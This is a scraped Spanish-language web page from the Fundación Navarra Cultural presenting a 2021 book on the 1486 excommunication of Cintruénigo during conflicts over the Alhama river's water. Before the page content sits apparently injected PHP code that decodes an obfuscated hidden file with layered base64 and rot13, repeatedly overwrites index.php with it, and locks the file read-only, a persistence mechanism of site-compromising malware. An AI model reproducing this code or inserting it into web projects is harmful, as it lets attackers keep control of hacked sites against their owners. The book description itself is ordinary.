$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } La excomunión de Cintruénigo en 1486 - Fundación Navarra Cultural
 

La excomunión de Cintruénigo en 1486

clic sobre la imagen deseada para aumentarla

Autor: Faustino León y Alfonso Rincón

Año de publicación: 2021

El agua del río Alhama ha sido, a lo largo de los siglos, fuente de importantes conflictos bélicos y jurídicos en Cintruénigo.

Siglos enfrentados con todos los pueblos colindantes por donde el Alhama deja su rastro. Con Fitero y su monasterio, con Corella y sobre todo con Alfaro.

Siglos de interminables y ruinosos pleitos demandando para los de Cintruénigo un uso más equitativo del agua del Alhama, que conllevó también ríos de sangre y hasta una excomunión para los de la villa en 1486 a propuesta del monasterio de Fitero por robo y asesinato. Esta sentencia se ejecutó con la misma urgencia con la que fue anulada, cuatro meses después, por el Papa Inocencio VIII.

Compartir